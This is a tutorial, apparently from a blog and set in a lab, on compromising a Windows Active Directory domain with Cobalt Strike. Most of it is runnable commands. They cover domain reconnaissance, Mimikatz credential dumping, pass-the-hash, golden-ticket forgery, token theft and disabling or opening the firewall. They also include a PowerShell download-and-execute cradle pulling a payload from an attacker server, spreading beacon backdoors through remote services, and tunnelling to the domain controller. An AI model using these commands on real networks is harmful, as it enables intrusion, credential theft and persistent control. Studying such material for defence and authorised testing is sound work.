Penetration within the Cobalt Strike domain

Solemnly declare:
This note is only prepared for the purpose of improving safety knowledge and sharing safety knowledge with more people. Do not use the technology in the note for illegal activities. The consequences caused by using the technology in the note have nothing to do with the author himself. We advocate that everyone is responsible for maintaining network security and jointly safeguard network civilization and harmony.

1 Experimental Environment

1.1 experimental topology

1.2 configure Win08/Win7

In real enterprise management, because ordinary domain users need the account and password of the domain administrator when doing some high-level operations. Sometimes, for convenience, users will add ordinary domain users to the local administrator group of the target host. Therefore, the tester01 domain user is added to the local administrator group of Win08 and Win7

2. Collect information within the domain

2.1 query current permission

  1. Get current user and domain SID

    whoami /all

  2. Query the details of the specified user

    # Query local user details
    net user user01
    
    # Query domain user details
    net user tester01 /domain
    

2.2 determine whether there is a domain

  1. Common judgment commands:

    shell ipconfig /all
    shell systeminfo
    
  2. net view /domain

    • Correct output indicates that this machine is in the domain;

    • If this command displays WORKGROUP at the display field, there is no field;

    • If an error is reported: a system error 5 occurs, the domain exists, but the user is not a domain user

    • Implement the solution of net view echo error

      Open cmd with administrator privileges and execute two commands

      net start Browser
      net stop mpssvc

      Execute net view again or prompt 6118. Exit, reopen cmd, and then execute net view

  3. shell net config workstation

2.3 finding domain controllers

  1. net time /domain

    There are three situations:

    • Domain exists. The current user is not a domain user

    • Domain exists and the current user is a domain user

    • The current network environment is a workgroup, and there is no domain

  2. View the machine name of the domain controller

    nltest /dclist:test

  3. View the host name of the domain control

    nslookup -type=SRV _ldap._tcp

  4. View domain control IP

    ping DC.test.lab
    nslookup dc
    
    # Determine whether the domain controller and DNS server are on the same server
    nslookup test.lab
    

  5. View the host name of the domain control

nslookup -type=SRV _ldap._tcp

  1. View domain controller groups

    net group "domain controllers" /domain

    In the actual network, there are usually two or more domain controllers in a domain as the primary and standby.

    netdom query pdc

2.4 query the current domain memory live host

2.4.1 using windows built-in command collection

net group "domain computers" /domain

2.4.2 using NetBIOS to detect Intranet

nbtscan - NETBIOS nameserver scanner (unixwiz.net)

NetBIOS is an application programming interface (API) used by LAN programs. It provides a unified command set for programs to request low-level services. Its function is to provide LAN with network and other special functions. Almost all LANs work on the basis of NetBIOS protocol.

nbtscan is a command-line tool used to scan access NetBIOS name servers on local and remote TCP/IP networks. The linux version is the same below.

nbtscan.exe 192.168.0.0/24

2.4.3 use ICMP to detect Intranet

for /L %I in (1,1,254) do @ping -w 1 -n 1 10.1.1.%I | findstr "TTL="

2.5 CS net collection

# View domain controller
shell nltest /dclist:[domain]
# When a 32-bit payload runs on a 64 bit system and the nltest path is wrong, you may be prompted that there is no nltest command. At this time, you can try to specify the path for it by using the following command
shell C:\windows\sysnative\nltest /dclist:[domain]

# net module in Beacon
net dclist : Lists the domain controllers for the current domain
net dclist [DOMAIN] : Lists the domain controllers for the specified domain
net share \\[name] : List the target's shares
net view : Lists the hosts in the current domain
net view [DOMAIN] : Lists the hosts for the specified domain

2.6 using powerview module to collect

# Import PowerShell script
powershell-import
PowerTools-2.0\PowerView\powerview.ps1

# Query local domain information
powershell Get-NetDomain

# Check if there is a network share
powershell Invoke-ShareFinder

3. Judge the local administrator

3.1 confirm whether the current user is a local administrator

  1. Query through Windows built-in command

    shell net localgroup "administrators"
    

  2. Try the command that requires administrator account permission to execute, and judge whether the current account has administrator permission by returning the result.

    shell dir \\win08\c$
    
    # The following results show that the domain account is also the local administrator of win08
    

  3. Using powerview to find local administrator users
    Invoke-FindLocalAdminAccess

3.2 confirm whether the current user is a domain administrator

shell net group "enterprise admins" /domain
shell net group "domain admins" /domain
shell net localgroup "administrators" /domain

From the following results, TEST\tester01 Not a domain administrator

3.3 PowerView module find local administrator

Get-Netlocalgroup -hostname win7

4 utilization

If the domain user is the local administrator of other domain member servers, the following operations can be performed without malware.

Here, take the remote host win08 as the target host for testing

4.1 document operation

  1. View file shares

    shell dir \\win08\c$
    

  2. Copy file

    shell copy \\win08\c$\users\administrator\desktop\file.txt
    

  3. View file list

    shell dir /s /b \\win08\c$\users
    # Where / S means to list all files in the specified directory and subdirectory, / B means to use empty format, that is, there is no title or summary information
    

4.2 running commands with WinRM

4.2.1 WinRM

WinRM (Windows Remote Management) is the implementation of WS management by windows. It runs on port 5985. WinRM allows remote users to use tools and scripts to manage Windows Servers and obtain data. The service is enabled by default in Server2008 R2. Since Server2012, the service has been integrated into the system. It is enabled by default. Win7 installs the service by default, but it is disabled by default. Win8 and Win10 are enabled by default. This remote connection will not be detected by the client and will not occupy the number of remote connections.

# Quickly run winrm on the server
c:\> winrm quickconfig

# Check the operation of winrm
c:\> winrm e winrm/config/listener

# View winrm configuration
c:\> winrm get winrm/config

# Set allowUnencrypted in the service to true to allow unencrypted communication
c:\> winrm set winrm/config/service @{AllowUnencrypted="true"}

# Set basic authentication in client to true to allow
c:\> winrm set winrm/config/client/auth @{Basic="true"}

# Set allowUnencrypted in the client to true to allow unencrypted communication
c:\> winrm set winrm/config/client @{AllowUnencrypted="true"}

# Set the client address trusted by the host. Here, host1, 2 and 3 can fill in the ip or host name of your client machine
c:\> winrm set winrm/config/client @{TrustedHosts="host1, host2, host3"} 

4.2.2 running commands with WinRM

powershell Invoke-Command -ComputerName win08 -ScriptBlock{ dir c:\}
# Note: if the command fails, it may be due to the WinRM configuration. Run the winrm quickconfig command in the powershell environment of the remote target host and enter y

4.3 running Mimikatz

Because the upload file size of beacon is limited to 1MB, while invoke mikatz The size of PS1 file is more than 2 MB (600K version), so running PowerShell import directly to import the file will report an error. The solution is as follows:

  1. Use the 600K version of Mimikatz

    powershell-import
    
    # powershell Invoke-Mimikatz -ComputerName TARGET
    powershell Invoke-Mimikatz -ComputerName win08
    

  2. Choose to use the upload command in beacon or upload the file in the File Browser graphical interface of the current session

    upload
    powershell import-module C:\Users\tester01\Invoke-Mimikatz.ps1
    
    # If you are prompted that the "invoke mikatz" item cannot be recognized as cmdlet s, functions,..., you can combine the two commands with semicolons, that is:
    powershell import-module C:\Users\tester01\Invoke-Mimikatz.ps1;Invoke-Mimikatz -ComputerName win08
    
  3. Using WinRM to generate Beacon session

    powershell Invoke-Command -ComputerName win08 -ScriptBlock{ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.2:280/a'))"}
    
    

5 login authentication

5.1 create login Token

Access Token: saves the permission information of the current user. Each process may be started as a different user, with different access tokens. If we want to operate as a domain user, we can obtain the process of local domain user identity at this time, and then steal the token.

Using Win08 host to make Token for accessing domain control

  1. View current user identity

    getuid
    

  2. View the current process and the user identities

    ps
    

  3. Execute steal on processes with high user identity_ Token operation

    steal_token 2116
    

  4. View current user identity

    getuid
    

  5. Make Token

    # make_token domain\user password
    make_token test\administrator Admin123
    

  6. View the C disk of domain control

    shell dir \\dc\c$
    

  7. Clear Token

    rev2self
    

5.2 using Password

  1. When the domain administrator account is used for authorization on the Win08 host, mimikatz is used to collect the password on the Win08 host and obtain the domain administrator password

  2. Establish remote connection

    # net use \\host\c$ /user:domain\user password
    shell net use \\dc\c$ /user:test\administrator Admin123
    

  3. View the C disk of domain control

    shell dir \\dc\c$
    

5.3 using Password Hash (Pass The Hash)

Pass The Hash requires lsass Exe process, so the operation needs to be performed with high permission. Have Administrator/System privileges.

  1. When the domain administrator account is used for authorization on the Win08 host, use mimikatz to collect the NTLM of the domain administrator on the Win08 host

    e45a314c664d40a227f9540121d1a29d
    
  2. Hash delivery attack on remote host

    # pth [domain \ username] [NTLM hash]
    pth .\administrator e45a314c664d40a227f9540121d1a29d
    

  3. View the C disk of domain control

    shell dir \\dc\c$
    

5.4 Golden Ticket

5.4.1 preconditions for utilization of gold notes

Detailed explanation of Kerberos gold notes - penetration test center - blog Park (cnblogs.com)

There is a domain account krbtgt with SID 502 in the domain environment. It is the account used by KDC service and belongs to the Domain Admins group. In the domain environment, the ticket of each user account is generated by krbtgt. If the attacker gets the NTLM Hash or AES-256 value of krbtgt, he can fake the identity of any user in the domain and access other services as that user.

When using the Golden Ticket of the domain for bill delivery, the following conditions are required:

  • A forged domain administrator user name is required.
  • Complete domain name.
  • Domain SID.
  • Get krbtgt's NTLM Hash or AES-256 value.

5.4.2 Kerberos gold note operation process

  1. Get domain SID

    shell whoami /user
    S-1-5-21-1207377116-2664972910-881425611
    

  2. Permission test before bill injection. Access denied will be displayed at this time

    shell dir \\dc\c$
    

  3. List gold notes

    shell klist
    
    # 64 bit
    shell c:\windows\sysnative\klist
    
  4. NTLM hash of KRBTGT user in DC

    # NTLM hash of KRBTGT user in DC can be obtained by dcsync or hashdump, or by loading mimikatz with powershell.
    hashdump
    fa02a0e57e5ba9189d00990ae64e87ce
    

  5. Make gold notes and inject them into memory

    # Domain needs to be filled in FQDN format, that is, Fully Qualified Domain Name, which is similar to test Format of lab
    
    mimikatz kerberos::golden /user:Administrator /domain:test.lab /sid:S-1-5-21-1207377116-2664972910-881425611 /krbtgt:fa02a0e57e5ba9189d00990ae64e87ce /ptt
    

  6. Verify permissions

    shell dir \\dc\c$
    

  7. Other commands

    # Clear tickets for current session
    kerberos_ticket_purge
    
    # Import ticket from ccache file to apply to this session
    kerberos_ccache_use
    
    # Import ticket from ticket file to apply to this session 
    kerberos_ticket_use
    

6. Internal network horizontal penetration

Win7 login user test\tester01 is known to be the local administrator of Win08

shell dir \\win08\c$

6.1 running Payload with WinRM

Premise: the target host can access the Internet, and the obtained permission is the user permission of the current command

powershell Invoke-Command -ComputerName win08 -ScriptBlock{ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.2:280/a'))" }

6.2 remote execution of Payload program with sc

Premise: the target host can access the Internet, and the obtained permission is SYSTEM permission.

  1. Generate Payload program

  2. Upload malicious programs to the controlled Win7 host

    upload C:\\f_carey\Desktop\beacon.exe (C:\Users\tester01\beacon.exe)
    

  3. Upload the Payload program to the intranet Win08 host on the controlled Win7

    shell copy C:\Users\tester01\beacon.exe \\win08\c$\windows\temp\beacon.exe
    

  4. Remote creation of Payload program service on win7

    shell sc \\win08 create beacon binpath= c:\windows\temp\beacon.exe
    

  5. Enable Payload program service remotely on win7

    shell sc \\win08 start beacon
    

  6. Remotely delete the created Payload program service on win7

    shell sc \\win08 delete beacon
    

6.3 remote execution of Payload program using at

  1. Generate Payload program

  2. Upload malicious programs to the controlled Win7 host

    upload C:\Users\f_carey\Desktop\artifact.exe (C:\Users\tester01\artifact.exe)
    

  3. Upload the Payload program to the intranet Win08 host on the controlled Win7

    shell copy C:\Users\tester01\artifact.exe \\win08\c$\windows\temp\artifact.exe
    

  4. View the current time of Win08 host

    shell net time \\win08
    

  5. Remotely set the schedule for executing the Payload program

    shell at \\win08 9:07:00 c:\windows\temp\artifact.exe
    

6.4 use login authentication to penetrate domain control

See subsection 5

7 intranet penetration

7.1 configure Socks agent (forward connection)

  1. Configure Socks proxy, right-click and select: proxy forwarding - Socks proxy

    socks 8888
    
    # Close Socks agent
    socks stop
    

  2. Use proxychains to cooperate with Socks agent to communicate on CS Server host

    # Configure proxychains
    vim /etc/proxychains.conf
    socks4  127.0.0.1 8888
    
    # nmap Socks proxy
    proxychains nmap -Pn -sT -p80 10.1.1.21
    

  3. Use MSF to cooperate with Socks agent to communicate on CS Server host

    msf6 > setg Proxies socks4:192.168.0.2:8888
    Proxies => socks4:192.168.0.2:8888
    msf6 > setg ReverseAllowProxy true
    ReverseAllowProxy => true
    
    # Cancel msf global proxy
    unsetg Proxies
    

7.2 configure forwarding listener (reverse connection)

Note: firewall release port should be considered for reverse connection

  1. Select Win08 session and right-click to select agent forwarding - forwarding listener. The forwarding listener here is equivalent to Win08 acting as an agent to forward traffic to DC.

    # The monitoring address shall be configured with intranet IP
    rportfwd 380 windows/beacon_reverse_tcp
    

  2. Generate an executable (s) back door, and the listener selects the forwarding listener

  3. Check whether the firewall on Win08 is on

    shell netsh firewall show opmode
    

  4. Configure firewall port of Win08

    shell netsh firewall add portopening TCP 380 "Listener" ENABLE ALL
    

  5. Execute steal on the process with domain administrator on Win08_ Token operation

    steal_token 876
    

  6. Upload the generated Payload backdoor to the Win08 directory and copy it to the domain control host

    upload C:\Users\f_carey\Desktop\beacon.exe (C:\Windows\Temp\beacon.exe)
    shell copy C:\Windows\Temp\beacon.exe \\dc\c$\windows\temp\beacon.exe
    

  7. Remote execution of Payload using sc/at

    shell sc \\dc create beacon binpath= c:\windows\temp\beacon.exe
    shell sc \\dc start beacon
    
    shell net time \\dc
    shell at \\dc 10:07:00 c:\windows\temp\beacon.exe
    

  8. Get domain controlled beacon session

7.3 Cobalt Strike SSH tunnel

SSH supports two-way communication tunnel, and will automatically encrypt and decrypt the network data between all SSH clients and servers. The communication of other TCP ports is forwarded through SSH connection, and the encrypted data can break through the restrictions of firewall access rules.

# Common parameters for establishing SSH tunnel:

-C
    Data compression required (include stdin, stdout, stderr And forwarding X11 and TCP/IP Connected data). Compression algorithm and gzip(1) Same as, In the first edition of the agreement, Compression level ``level use CompressionLevel Option control. Compression technology in modem Useful on lines or other slow connections, But on high-speed networks, it may slow down. This parameter can be set separately for each host in the configuration file. See also Compression option.

-g
    Allow remote hosts to connect to local forwarding ports.That is, when multiplexing access, it acts as a gateway to support multi host access to local listening port and gateway mode forwarding RDP,NC shell 

-n
    hold stdin Redirect to /dev/null (Actually prevent from stdin Read data). This option must be used when running in the background. Its common skill is to run remotely X11 program. for example, ssh -n shadows.cs.hut.fi emacs Will be in shadows.cs.hut.fi Upper start emacs, At the same time, it is automatically forwarded in the encrypted channel X11 connect. Run in the background. (But if a password or cipher is required, It won't work this way; See -f option.)

-N
    Do not execute remote commands. Port for forwarding. (Second edition of the agreement only),That is, do not perform login shell

-f
    Background running program. This option implies -n option. Start on remote machine X11 The recommended method of the program is similar to ssh -f host xterm Command of.

-p port
    Specify the port of the remote host. This parameter can be set separately for each host in the configuration file.

-q
    Quiet mode. Eliminate all warnings and diagnostic messages.

-L port:host:hostport
    Local machine(Client)Forward a port of to the specified port of the remote specified machine. It works like this, One is assigned on the local machine socket Listen port port, Once there is a connection on this port, The connection is forwarded through the secure channel, Simultaneous remote host and host of hostport Port establish connection. You can specify the forwarding of the port in the configuration file. only root To forward privileged ports. IPv6 The address is described in another format: port/host/hostport

-R port:host:hostport
    Connect remote host(The server)Forward a port of to the specified port of the specified machine on the local side. It works like this, One is assigned on the remote host socket Listen port port, Once there is a connection on this port, The connection turns out through a safe passage, Both local host and host of hostport Port establish connection. You can specify the forwarding of the port in the configuration file. Only use root Login to the remote host to forward the privileged port. IPv6 The address is described in another format: port/host/hostport

-D port
    Specify a local machine for dynamic application port forwarding. It works like this, One is assigned on the local machine socket Listen port port, Once there is a connection on this port, The connection is forwarded through the secure channel, According to the protocol of the application, you can determine where the remote host will connect. Current support SOCKS4 agreement, Will act as SOCKS4 The server. only root To forward privileged ports. The forwarding of dynamic ports can be specified in the configuration file.

-T
    Prohibit assigning pseudo terminals.

7.3.1 experimental environment

  1. Experimental topology

  2. premise

    1. The Beacon session of Win7 has been obtained, and the session has been configured into mutual transaction mode

    2. The WebServer account and password have been known, and the SSH service has been opened on the WebServer server

    3. The login token of the DC server has been obtained, and the DC server has closed the firewall or released port 445

      netsh firewall add portopening TCP 445 "SMB" ENABLE ALL
      

7.3.2 steps for configuring SSH tunnel (SSH Over Socks4)

  1. Configure TeamServer host

    # 1. Configure CS Server and WEB Server to establish dynamic port forwarding
    ssh -CNfg -D <local listen port> user@<ssh server> -p <ssh server port>
    
    ssh -CNfg -D 1080 root@192.168.0.3 -p 23
    
    # 2. Configure SSH Over Socks4 port forwarding
    # Data accessing TeamServer local port 445 will be forwarded to port 445 of 10.0.0.6 
    socat TCP4-LISTEN:445,fork SOCKS4:localhost:10.0.0.6:445
    

    Knowledge supplement: SSH Over SCTP (using Socat)

    # remote server 
    # Suppose you are going to let SCTP socket listen on port 80/SCTP and sshd port 22/TCP
    $ socat SCTP-LISTEN:80,fork TCP:localhost:22
    
    # Local end
    # Server_ Replace the IP with the address of the remote server, and then replace 80 with the port number monitored by SCTP
    $ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
    # Create socks proxy
    # Replace the port numbers of username and - p
    $ ssh -lusername localhost -D 8080 -p 1337
    
  2. Create DC server token in CS

    # make_token domainname\username password
    make_token DC\Administrator Admin123
    

  3. Create Beacon session for DC server

    # Create an SMB beacon in CS
    # Create Beacon session of DC server through springboard machine
    jump psexec_psh Springboard machine IP smb-beacon
    # The springboard machine here is the IP of teamserver, because the 445 port forwarded on teamserver
    
    jump psexec_psh 192.168.0.2 smb-beacon
    

Keywords: security metasploit

Added by silvrfoxx on Tue, 25 Jan 2022 18:08:38 +0200